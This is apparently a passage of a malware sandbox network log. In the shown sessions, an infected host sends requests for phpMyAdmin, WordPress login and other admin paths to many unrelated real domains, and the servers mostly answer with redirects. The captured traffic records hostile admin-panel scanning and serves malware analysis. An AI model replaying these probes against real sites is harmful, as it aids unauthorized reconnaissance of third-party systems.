                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.212615967 CET | 485 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.212786913 CET184INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 ef a6 bd 96 18 48 6b ac 05 c5 22 39 b4 47 89 8b 11 8c 11 8d 05 ff be 31 ed b1 73 59 76 76 18 de d2 5c 96 05 8b 68 2e 78 ea 87 bc cb 42 b0 d2 be a1 45 12 cc 64 e7 66 ee 87 8d 92 ef
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0D~EHHk"9G1sYvv\h.xBEdf!T]n xJ{Hj@U!,(E`i VffX2|


Session ID | Source IP | Source Port | Destination IP | Destination Port
378 | 192.168.2.6 | 62938 | 3.141.96.53 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.088480949 CET | 186 | OUT | GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: money-farm.cc
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.212960005 CET | 161 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                location: https://money-farm.cc/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
379 | 192.168.2.6 | 62944 | 20.231.114.24 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.092833996 CET | 179 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.mojang.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.209356070 CET | 351 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.minecraft.net/
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
380 | 192.168.2.6 | 62945 | 44.199.96.179 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.092910051 CET | 183 | OUT | GET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pxndx-mcr.boletia.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.210130930 CET | 402 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 185
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.12.2
                                                                                                                                                                                                                                                                                                                                                                Location: https://pxndx-mcr.boletia.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.12.2</center></body></html>
Feb 5, 2024 12:16:10.464705944 CET | 233 | OUT | GET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pxndx-mcr.boletia.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://pxndx-mcr.boletia.com/wp-login.php
Feb 5, 2024 12:16:10.584340096 CET | 399 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 185
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.12.2
                                                                                                                                                                                                                                                                                                                                                                Location: https://pxndx-mcr.boletia.com/wp-admin/
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.12.2</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port
381         192.168.2.6  62963        31.13.65.1      80
Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:16:07.098143101 CET  179  OUT  GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: hi-in.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.201415062 CET  213  IN  HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://hi-in.facebook.com/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port
382         192.168.2.6  62845        185.51.191.48   80
Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:16:07.112692118 CET  180  OUT  GET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: innovationdevelopment.eu
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.379292965 CET  239  IN  HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                Location: http://innovationdevelopment.eu/admin/w
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
Feb 5, 2024 12:16:07.385289907 CET  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port
383         192.168.2.6  62964        104.18.32.109   80
Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:16:07.116134882 CET  176  OUT  GET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: sport.autoplay.cloud
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.259362936 CET  608  IN  HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://sport.autoplay.cloud/admin/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=YOyxb9aU78NaI96z2sr4QbRuq80T5iBgvIchIzUA8sc-1707131767-1-AeL6bfGfUZ6U/Ap1Ak+vwqFlIGc33k6j5+9DW+6potT7/e/iNxD6laTBd7Qn7PszDDObqSeT9QEqBj5vyiFCIYY=; path=/; expires=Mon, 05-Feb-24 11:46:07 GMT; domain=.autoplay.cloud; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd48cabab0eb-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port
384         192.168.2.6  62954        138.197.59.199  80
Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:16:07.116137981 CET  184  OUT  GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: api.cmrsanmartin.ziz.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.237778902 CET  564  IN  HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Location: https://api.cmrsanmartin.ziz.cl/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://api.cmrsanmartin.ziz.cl/phpMyAdmin/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at api.cmrsanmartin.ziz.cl Port 80</address></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port
385         192.168.2.6  62955        3.134.125.175   80
Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:16:07.117799997 CET  190  OUT  GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 3fba-180-252-166-236.ngrok.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.242573977 CET | 328 | IN | HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://3fba-180-252-166-236.ngrok.io/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Trace-Id: 7c1ca6c8e035d86bf45e17d87f787cea
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 85
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <a href="https://3fba-180-252-166-236.ngrok.io/phpMyAdmin/">Temporary Redirect</a>.


Session ID | Source IP | Source Port | Destination IP | Destination Port
386 | 192.168.2.6 | 62977 | 3.161.150.69 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.117844105 CET | 180 | OUT | GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.booking.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.221394062 CET | 580 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://account.booking.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 3e445414cb8134bf4b609fdcfe022fcc.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P5
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: DDxbFguVMoQVA0kq9vcc7-DDtP_b8q3f6_KzEOjNvQ3GNJ5z4T9jzQ==
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
387 | 192.168.2.6 | 62933 | 54.183.63.241 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.118530989 CET | 179 | OUT | GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pt.secure.imvu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.300959110 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.17.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.4
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=6ad362c97b4f2eb28aeb4b8d23703fe9; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=6ad362c97b4f2eb28aeb4b8d23703fe9; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                x-imvu-rnd: dRlEpjkJUklYfdQGFcNjovzP
                                                                                                                                                                                                                                                                                                                                                                content-language: pt-br
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port
388 | 192.168.2.6 | 62932 | 44.233.131.115 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.134409904 CET | 174 | OUT | GET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: cloud.simplify3d.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.306911945 CET379INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://cloud.simplify3d.com/pma/
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
389 | 192.168.2.6 | 62967 | 64.91.249.20 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.139781952 CET | 174 | OUT | GET /wp-login.php HTTP/1.1
Host: chainmine.io
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.285948038 CET | 357 | IN | HTTP/1.1 302 Moved Temporarily
Date: Mon, 05 Feb 2024 11:16:07 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
X-Powered-By: PHP/5.4.16
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Location: http://ww7.chainmine.io/wp-login.php?usid=27&utid=4923817197
Content-Length: 0
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port
390 | 192.168.2.6 | 62998 | 34.149.46.130 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.144015074 CET | 182 | OUT | GET /PhpMyAdmin/ HTTP/1.1
Host: accounts.snapchat.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.248286963 CET | 211 | IN | HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: https://accounts.snapchat.com:443/PhpMyAdmin/
Content-Length: 0
Date: Mon, 05 Feb 2024 11:16:07 GMT
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port
391 | 192.168.2.6 | 62971 | 103.224.182.210 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.151710033 CET | 228 | OUT | GET /wp-admin/ HTTP/1.1
Host: followerstiktok.xyz
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: http://followerstiktok.xyz/wp-login.php
Feb 5, 2024 12:16:07.307220936 CET | 346 | IN | HTTP/1.1 302 Found
date: Mon, 05 Feb 2024 11:16:07 GMT
server: Apache
set-cookie: __tad=1707131767.6447963; expires=Thu, 02-Feb-2034 11:16:07 GMT; Max-Age=315360000
location: http://ww16.followerstiktok.xyz/wp-admin/?sub1=20240205-2216-072b-880c-130055c7e3e5
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
Data Raw: 0a 0a
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port
392 | 192.168.2.6 | 63015 | 192.185.5.23 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.154084921 CET | 173 | OUT | GET /admin.php HTTP/1.1
Host: multiideas.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.281251907 CET | 226 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:16:07 GMT
Server: nginx/1.23.4
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Vary: User-Agent
Set-Cookie: PHPSESSID=6a863be9643b7bff70e69f550745b56e; path=/


Session ID | Source IP | Source Port | Destination IP | Destination Port
393 | 192.168.2.6 | 62941 | 47.251.24.188 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.156270027 CET | 172 | OUT | GET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: cjdropshipping.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.342726946 CET | 345 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://cjdropshipping.com/pma
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
394 | 192.168.2.6 | 63006 | 104.22.74.220 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.163409948 CET | 174 | OUT | GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mojadovera.sk
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.291172028 CET | 345 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://mojadovera.sk/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd491e8ab0fd-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
395 | 192.168.2.6 | 63049 | 13.249.120.4 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.172538996 CET | 165 | OUT | GET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: tiktok.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:07.274214983 CET | 565 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://tiktok.com/admin
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 4eb6db543899d63048055031c3411b00.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL51-C1
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: fLEkV-kEmXDNeW-9EV63tcD1tcMYdS1mYEtsOEpKx1tejv2JxRCjKA==
